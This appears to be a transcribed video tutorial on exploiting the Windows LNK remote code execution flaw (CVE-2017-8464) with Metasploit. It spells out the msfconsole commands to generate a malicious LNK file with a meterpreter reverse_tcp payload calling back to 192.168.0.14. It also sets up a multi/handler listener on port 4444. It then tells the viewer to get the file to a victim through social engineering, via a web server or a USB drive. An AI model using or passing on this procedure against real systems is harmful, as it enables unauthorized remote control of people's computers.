Welcome. In this video, we are going to learn LNK code execution vulnerability in Metasploit module. Today, we are going to learn about a remote code execution exploit in Microsoft Windows. It's called Microsoft Windows LNK CVE 2017-8464 LNK RCE exploit. Earlier, also we have some LNK vulnerabilities in Microsoft Windows, but this one is special because a victim need not even click on the file we are creating as part of this exploit. We can host this file on web server and direct our victim to that site. Otherwise, we can save the file to USB drive and insert it in our target system. The both require a bit of social engineering. This exploit works due to vulnerability in Microsoft Windows that could allow remote code execution. An attacker who successfully exploits this vulnerability could gain the same user rights as the local user. Let us see how this exploit works. Let's open up terminal, type msf console. Let's load the CVE 2017-8464 LNK RSE module into the MSF console. So type use exploit /Windows file format CVE _ 2017-8464 LNK RCE. Type command info to see more information about the module. Let's see the basic option. The DLL name, the DLL file name containing the payload, drive letter assigned to USB drive on victim's machine, file name, the LNK file name. Now let's set the Windows /meterpreter /reverse _ TCP payload. Type set payload Windows /meterpreter /reverse _ TCP. Type show option. Here you can see that payload option. Let's set lhost as 192.168.0.14. Type lhost space 192.168.0.14. Type exploit. Here you can see that LNK file is created in root /.msf4 /local directory. Now let's load exploit multi-handler tool. Type use exploit /multi /handler. Set payload as Windows /meterpreter /reverse _ TCP. Type set payload Windows /meterpreter /reverse _ TCP. Type lhost as 192.168.0.14. Let's execute handler listener. Type exploit. Here you can see that it is listening on 4444 port. Send LNK file to victim using social engineering technique. Once he open, Metasploit session will open up here. That's it in this video on LNK code execution vulnerability in Metasploit module. Thank you for watching this video.